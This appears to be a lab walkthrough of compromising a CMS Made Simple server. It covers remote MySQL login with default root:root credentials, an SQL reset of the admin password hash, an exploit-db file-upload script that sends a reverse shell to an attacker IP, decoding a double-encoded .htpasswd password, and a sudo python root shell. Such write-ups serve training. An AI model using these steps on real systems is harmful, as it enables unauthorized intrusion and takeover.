# My-CMSMS

## Nmap

```
sudo nmap 192.168.152.74 -p- -sS -sV

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.38 ((Debian))
3306/tcp  open  mysql   MySQL 8.0.19
33060/tcp open  mysqlx?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Checking out port 80 takes us to the default page for CMS made simple.

![](/files/-MXRW0POHtOX2NthADll)

I then ran dirsearch.py against the host, which also discovered phpmyadmin, locked behind HTTP basic auth.

```
python3 dirsearch.py -u http://192.168.152.74 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 60 --full-url
```

![](/files/-MXRbJc4ysb2y3lFvzir)

I attempted to brute-force the phpmyadmin login and the CMSMS login, but was unable to find valid credentials for either.

I was, however, able to log in to MySQL remotely with the credentials `root:root`.

```
mysql -u root -p -h 192.168.152.74
```

![](/files/-MXRbkpqPbXw1iblAhCx)

From here we can view the databases and move into the `cmsms_db` database.

```
use cmsms_db;
show tables;
```

![](/files/-MXRcDnoFmk1b6dHKBbS)

Looking at the tables that exist in the database, we select all columns from the `cms_users` table.

```
select * from cms_users;
```

![](/files/-MXRcPlfBcYKYeO6lG7s)

This reveals an MD5 password hash for the admin account. I was unable to crack it with several wordlists, however.

As we are the root account on MySQL, we can instead change the password to something we know and use that to log in to CMSMS.

CMSMS stores admin passwords as the MD5 of the site's `sitemask` preference concatenated with the password, which is why the query reads the mask from `cms_siteprefs` before hashing. Run the following command to set the admin user's password to `weakpass`:

```
update cms_users
set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'), ''), 'weakpass')))
where username = 'admin';
```

{% hint style="info" %}
<https://cmscanbesimple.org/blog/cms-made-simple-admin-password-recovery>
{% endhint %}

The password has now changed:

![](/files/-MXRgE0vIKhPeEyk_6Ob)

We can then move over to the /admin/ directory in the browser and login with the new credentials.

![](/files/-MXRgUBm93MvJyhLhNyj)

Searching for exploits on CMSMS now that we are authenticated gives a few results.

![](/files/-MXRiLxXGRjxEINH-fNF)

As we are running version 2.2.13, I will try the arbitrary file upload exploit written for version 2.2.14.

{% embed url="https://www.exploit-db.com/exploits/48779" %}

Once the Python script was downloaded, I executed it with the following syntax:

```
python3 48779.py --url http://192.168.152.74/admin/login.php -u admin -p weakpass -lhost 192.168.49.152 -l 80
```

![](/files/-MXRihC0bsjTFQvEGoEa)

When ready, I set a `netcat` listener and prompted the script to continue, resulting in a shell as www-data.

![](/files/-MXRipKf0pcf68IHkrS5)

Moving around the target machine, we find a `.htpasswd` file hidden in `/var/www/html/admin/`. Running `cat` on the file gives the value `TUZaRzIzM1ZPSTVGRzJESk1WV0dJUUJSR0laUT09PT0=`.

From here we can decode it with base64 and then base32, as the string is double encoded.

![](/files/-MXRxs3tSWlV10YxHN1W)
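As an added example (not part of the original writeup), the following Python helper reproduces the base64-then-base32 unwrapping of the `.htpasswd` value quoted above and generalises it by detecting each layer from its alphabet; the regex heuristic and the function names are my own, and the only input is the string from the writeup.

```python
import base64
import binascii
import re

# The value the writeup reads out of /var/www/html/admin/.htpasswd
HTPASSWD_BLOB = "TUZaRzIzM1ZPSTVGRzJESk1WV0dJUUJSR0laUT09PT0="

# Base32 uses A-Z and 2-7; base64 uses A-Z, a-z, 0-9, + and /
B32_RE = re.compile(r"^[A-Z2-7]+=*$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+=*$")


def peel_layer(text):
    """Strip one encoding layer; return (scheme, decoded) or None."""
    # Base32 is tried first: its alphabet is a subset of base64's, so a
    # base32 string would otherwise always be mistaken for base64.
    for scheme, pattern, decoder in (
        ("base32", B32_RE, base64.b32decode),
        ("base64", B64_RE, base64.b64decode),
    ):
        if not pattern.match(text):
            continue
        try:
            decoded = decoder(text).decode("ascii")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue
        # Only accept a layer that yields printable text (another layer or the secret)
        if decoded.isprintable():
            return scheme, decoded
    return None


def peel_all(text, max_layers=5):
    """Repeatedly strip layers until the text no longer decodes cleanly."""
    layers = []
    current = text
    for _ in range(max_layers):
        result = peel_layer(current)
        if result is None:
            break
        scheme, current = result
        layers.append(scheme)
    return layers, current


if __name__ == "__main__":
    layers, plaintext = peel_all(HTPASSWD_BLOB)
    user = plaintext.split(":", 1)[0]
    print("layers:", " -> ".join(layers), "| htpasswd user:", user)
```

The result is an `htpasswd`-style `user:password` line; encoding is not encryption, so a credential stored this way is recoverable by anyone who can read the file.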

We can then use `su` to switch to the armour account, logging in with the password we have discovered.

![](/files/-MXRyFu1J1Qps-Z_K0yO)

Checking `sudo -l` shows we can run python as root without supplying a password.

![](/files/-MXRyPcnD8gNC-53ELMX)

We can then spawn a root shell with python.

```
sudo python -c 'import os; os.system("/bin/sh")'
```

![](/files/-MXRyhTvXbcaGiVxhD_0)
